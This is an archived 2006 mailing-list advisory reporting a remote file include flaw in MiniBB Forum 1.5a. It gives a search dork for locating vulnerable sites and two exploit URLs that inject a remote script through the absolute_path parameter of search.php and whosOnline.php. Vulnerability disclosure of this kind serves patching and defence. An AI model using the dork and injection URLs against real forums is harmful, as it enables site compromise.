OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)

From: AG Spider (ag-spiderhotmail.com)
Date: Fri Jul 21 2006 - 15:33:43 CDT


Title : MiniBB Forum <= 1.5a Remote File Include (search.php-whosOnline.php)
###############################################################################

Discovered By :::: {{AG-Spider & KaBaRa.HaCk .eGy}}

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 1.5a (search.php-whosOnline.php)version :
version [ 1.5 ]
exploit :Remote File Include
-----------------------------------------------------------------------------

dork : "Powered by miniBB 1.5 ©"
Exploit : http://www.example.com/search.php?absolute_path=[shellcode]?
                   
http://www.example.com/whosOnline.php?absolute_path=[shellcode]?

----------------------------------------------------------------------------

greetz4: [ Black-Code - KILLERxXx - Mr.SheHa - eGyPT GHosT]

c0natct us : KaBaRa.HaCk.eGy [ at ] HoTMail.CoM
                    AG-Spider [ at ] HoTMail.CoM

_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb